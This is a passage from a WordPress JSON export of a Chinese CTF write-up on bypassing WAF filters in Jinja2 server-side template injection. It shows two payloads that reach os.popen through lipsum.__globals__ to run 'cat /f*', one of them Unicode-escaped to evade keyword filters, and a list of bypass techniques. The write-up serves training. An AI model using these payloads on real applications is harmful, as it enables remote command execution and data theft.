\/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306231629-2.png'><img 
class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306231629-2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"Pasted image 20260306231629.png\"><\/div><br \/>\n<img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306231639-2.png\" alt=\"Pasted image 20260306231639.png\"><\/p>\n<h3>\u65b9\u6cd5\u4e09<\/h3>\n<p>Unicode \u7f16\u7801+attr()\u7ed5\u8fc7<br \/>\n<code>.<\/code>\u7b49\u4ef7\u4e8e<code>|attr()<\/code>\uff0c\u5373<code>''|attr(&quot;__class__&quot;)<\/code>\u7b49\u6548\u4e8e<code>''.__class__<\/code><\/p>\n<pre><code>{{lipsum.__globals__.get('os').popen('cat \/f*').read()}}\n<\/code><\/pre>\n<pre><code>{{lipsum|attr(&quot;\\u005f\\u005f\\u0067\\u006c\\u006f\\u0062\\u0061\\u006c\\u0073\\u005f\\u005f&quot;)|attr(&quot;\\u0067\\u0065\\u0074&quot;)(&quot;\\u006f\\u0073&quot;)|attr(&quot;\\u0070\\u006f\\u0070\\u0065\\u006e&quot;)(&quot;cat \/f*&quot;)|attr(&quot;\\u0072\\u0065\\u0061\\u0064&quot;)()}}\n<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306232621-2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306232621-2.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"Pasted image 20260306232621.png\"><\/div><br \/>\n<img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306232630-2.png\" alt=\"Pasted image 20260306232630.png\"><\/p>\n<h1>\u603b\u7ed3<\/h1>\n<ul>\n<li>\u5341\u516d\u8fdb\u5236\u3001Unicode \u7f16\u7801\u7ed5\u8fc7\u5173\u952e\u5b57\u8fc7\u6ee4<\/li>\n<li>\u65b9\u62ec\u53f7\u00a0<code>[]<\/code>\u66ff\u6362<code>.<\/code><\/li>\n<li>\u8fc7\u6ee4\u5173\u952e\u5b57\u4f7f\u7528+\u62fc\u63a5\u7ed5\u8fc7<\/li>\n<li>request\u7ed5\u8fc7\uff1a\u9884\u8bbe\u67e5\u8be2\u53c2\u6570+\u4eceurl\u4e2d\u4f20\u9012\u503c\u62fc\u63a5\u7684\u65b9\u6cd5\u6765\u7ed5\u8fc7\u76f4\u63a5\u5bf9\u6a21\u677f\u53c2\u6570\u7684\u8fc7\u6ee4<\/li>\n<li>attr()\u7ed5\u8fc7\uff1a|attr()\u66ff\u6362<code>.<\/code><\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>\u4e00\u3001\u8bbf\u95ee\u9898\u76ee \u4e0b\u8f7d\u6e90\u7801app.py \u4e8c\u3001\u4ee3\u7801\u5ba1\u8ba1 import os import re from flask 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8,22,23],"tags":[70,90],"class_list":["post-3053","post","type-post","status-publish","format-standard","hentry","category-ctf","category-ctf-web","category-nssctf","tag-ssti","tag-waf"],"_links":{"self":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/3053","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/comments?post=3053"}],"version-history":[{"count":1,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/3053\/revisions"}],"predecessor-version":[{"id":3054,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/3053\/revisions\/3054"}],"wp:attachment":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/media?parent=3053"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/categories?post=3053"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/tags?post=3053"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}